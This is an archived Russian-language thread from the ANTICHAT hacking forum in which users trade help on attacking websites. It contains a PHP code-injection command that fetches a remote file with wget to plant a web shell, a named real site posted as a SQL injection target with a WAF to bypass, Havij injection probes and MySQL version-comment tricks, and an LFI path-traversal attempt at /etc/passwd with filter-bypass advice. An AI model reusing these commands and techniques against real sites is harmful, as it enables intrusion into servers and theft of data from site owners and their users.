ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.11.2012, 23:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Sat-hacker
Sat-hacker said:
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')
слабо читать учебник по linux?
кури маны curl,wget,lynx, если система BSD то (fetch)
|
|
|

06.11.2012, 23:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 34457
Репутация:
-10
|
|
Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?
|
|
|
|

07.11.2012, 00:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Sat-hacker
Sat-hacker said:
Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?
в гугле
|
|
|

07.11.2012, 09:24
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Помогите со скулей, никак не получается из-за WAF
http://www.paladins.ru/deskart.php?cat=4&conk=-1
|
|
|

07.11.2012, 22:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 44130
Репутация:
26
|
|
Сообщение от intertrey
intertrey said:
Отснифал havij, к примеру такие запросы посылает
http://site/ambassadors/event.php?id=939
http://site/ambassadors/event.php?id=999999.9
http://site/ambassadors/event.php?id=939 and 1=1
http://site/ambassadors/event.php?id=939 and 1>1
http://site/ambassadors/event.php?id=939 and 1=1
http://site/ambassadors/event.php?id=939'
http://site/ambassadors/event.php?id=/*!30000 939*/
http://site/ambassadors/event.php?id=/*!40100 939*/
http://site/ambassadors/event.php?id=/*!50000 939*/
Зачем он как думаете сначала так проверяет and 1=1, патом так and 1>1 и патом снова and 1=1 какая тут логика может быть работы?
И еще интересно как такие комменты работают /*!30000 939*/ растолкуйте простым языком, результат вывода как по первой ссылке с простым 939
1) Проверяет наличие инъекции, т.к. and 1 = 1 возвращает истину, а and 1 > 1 - ложь, отсюда меняется размер или содержание страницы и т.о. проверяется наличие инъекции.
2)
Комментарии /*!int */ в котором, всё заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше.
Код:
Code:
SELECT pass/*!32302 ,login*/FROM users
Выведет столбец login если версия MySQL равна либо выше 3.23.02
|
|
|
|

08.11.2012, 13:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 11980
Репутация:
1
|
|
LFI
Сообщение от None
http://site.ru/index.php?razdel=17&module=%27../../../../../../../../../../../../../../etc/passwrd Warning: include(/var/www/hosts/default/avax/modules/\'etcpasswrd/module.php) [function.include]: failed to open stream: No such file or directory in /var/www/hosts/default/req/core.php on line 144 Warning: include() [function.include]: Failed opening '/var/www/hosts/default/avax/modules/\'etcpasswrd/module.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/hosts/default/req/core.php on line 144
что делать?
|
|
|
|

08.11.2012, 14:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 19438
Репутация:
0
|
|
Сообщение от ReV0LVeR
ReV0LVeR said:
что делать?
зачем кавычка в начале? да и вообще не факт что там есть LFI
|
|
|
|

08.11.2012, 14:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 11980
Репутация:
1
|
|
Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.
поэтому не получается подняться на каталоги выше.
Вопрос кто работал с протоколом "data:"
Есть возможность использовать его при LFI?
Какие еще варианты обхода фильтрации при локальном инклуде?
|
|
|
|

08.11.2012, 15:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 44130
Репутация:
26
|
|
Сообщение от intertrey
intertrey said:
Спасибо за разъяснение, интересный способ определения предварительный версии mysql. Подскажите такой вопрос.
Мне хочется понять как он работает на начальном этапе, чтобы для себя выработать наиболее оптимальный и точный механизм определения есть ли на сайте sqli инъекция или нету. А то существующие утилиты, как то удручают для массового чека.
Мне интересно, как havij определяет, что данный тип динамически подставляемого параметра, является или числовым или строковым? Как за наименьшее количество запросов, это можно определить в принципе?
Если кто нить видел достаточно полную методику определения возможности существования sqli инъекции, то поделитесь, типа там:
Проверяем на кавычки, смотрим разницу в размере. Если да, то хорошо, пробиваем по ошибкам mysql вдруг есть, далее определяем тип переменной строковая или числовая, подставляем сравнения сначала or 1>1 истина или там or 1>2 ложь, в зависимости от типа переменной запрос может выглядеть так: 15 'и' blabla '='blabla Можем там проверить на order by c group by. Далее перебираем, ищем нужные столбы и если там вывелось нужное определенное слово ~'version()'~ ~'database()'~ то у такого сайта в 80% есть sqli к примеру. Blind в расчёт не беру.
Ну в mysql если параметр число, то тип числовой,если строка то строковой, как правило. Логично же?) В факе от Dr. Zero(на рдоте) всё описано и разжёвано, как определять sqli и прочие. Если числовой тип, то делай ?id=5-1, если есть инъекция, и не фильтруется минус, то выведется 4-ая новость или т.п.
Алгоритм выведешь на основе своей практики. Читайте больше, всё разжёвано.
Сообщение от ReV0LVeR
ReV0LVeR said:
Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.
поэтому не получается подняться на каталоги выше.
Вопрос кто работал с протоколом "data:"
Есть возможность использовать его при LFI?
Какие еще варианты обхода фильтрации при локальном инклуде?
Чтобы использовать wrappers, нужно чтобы до переменной в функции ничего небыло(пути). Типо include ($_GET['p'].'.php');
В твоём случае не получится.
|
|
|
|

08.11.2012, 20:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
Как обойти редирект на index.php при MySQL ошибке?
Выключение редиректа в браузере не помогает.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|